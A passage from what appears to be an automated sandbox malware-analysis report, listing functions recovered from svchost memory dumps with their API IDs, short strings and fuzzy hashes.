                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: 3e867b7d4d189a9cd719c490165554fb6eb336014189e9f604563abfe8a1f8ef
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: 6E119036B28B6091FB52DB65E8153DA63B0F786788F8040229E4D83B94EF29C94DCB40
                                                        Function 00000179537A14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: e78f26ca184d764000d89565f007e055ff26359903c14b84110eba1c98e71f14
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: 1F015E32A18FA0C6E705DFA6E81818977B8F789F88F494426EA4D43718EF38C499C740
                                                        Function 00000179537A2618 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: dc0b507d5e09e8eac221445b1832d89422a8f0a473ec454f1eb2ac7a0768d18a
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: 0871A332A187A186F76ADF2698543EE67B1F38B788F440017EE4D53B98DE34C6899700
                                                        Function 000001795377D178 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000003.1829522378.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_3_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: 6bc2694769228161bd14d36e3a6bfcb1cb197da451946efb8bacc1e32d88d287
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: D761A031E0C76482FAA79B2595403ED6BF4F74778CF15452BDA0E177A0DA38CA4E8310
                                                        Function 00000179537A95F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: 2145b32293d8455ca781e841aa1131d5b0ada0deb8261f70c7fb98eec7146ba9
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 5A111F32A18B5482EB128F15F54039977B5FB89B98F184221DF8D07754DF3CC555C700
                                                        Function 00000179537AD77C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: 6f59caf677cd616514c29672b532e05b8789abae37375141e2129ee3131dacc8
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: BDF0E231B18B60C1FB169B81F4506D92370EB4ABD8F484127EA0D03B95DE38C5ADC340